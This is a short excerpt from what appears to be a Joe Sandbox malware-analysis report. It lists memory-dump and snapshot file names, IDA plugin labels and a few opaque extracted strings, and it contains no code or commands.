                                                  • Associated: 00000006.00000002.2978912261.0000000003AB9000.00000040.00001000.00020000.00000000.sdmp
                                                  • Associated: 00000006.00000002.2978912261.0000000003ABD000.00000040.00001000.00020000.00000000.sdmp
                                                  • Associated: 00000006.00000002.2978912261.0000000003B2E000.00000040.00001000.00020000.00000000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_6_2_3990000_sc.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: $$@
                                                  • API String ID: 0-1194432280
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000006.00000002.2978600277.0000000003720000.00000040.00000800.00020000.00000000.sdmp, Offset: 03720000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_6_2_3720000_sc.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: #i%($6!$K4}v$}v5M
                                                  • API String ID: 0-3327408589